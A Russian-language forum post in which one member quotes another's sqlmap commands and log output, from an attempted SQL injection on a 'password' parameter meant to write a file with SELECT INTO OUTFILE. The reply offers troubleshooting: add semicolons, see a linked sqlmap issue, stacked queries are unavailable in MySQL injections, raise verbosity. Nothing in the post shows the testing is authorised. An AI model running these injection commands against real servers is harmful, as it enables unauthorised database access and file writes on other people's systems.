13.07.2021, 01:57
|
|
Участник форума
Регистрация: 15.09.2018
Сообщений: 236
С нами:
4033046
Репутация:
212
|
|
Сообщение от Рамос
↑
@@secure_file_priv
Код:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
[23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
[23:18:45] [INFO] resumed: ' '
select @@secure_file_priv: ' '
--technique=E
Код:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E
[23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
--technique=B
Код:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B
[23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
С правами все нормально, не могу понять только почему не выполняется into outfile
ну для начала стоит поставить точку с запятой в последние запросы)) хотя мб в склмап это не нужно,
давно не юзал.
+
https://github.com/sqlmapproject/sqlmap/issues/619
Вообще ошибка на stacked queries, а в мускуле таких инъекций нет,
не знаю, я бы включил verbose на максимум, попробовал руками.
Больше, наверное, ничем не смогу помочь.
|
|
|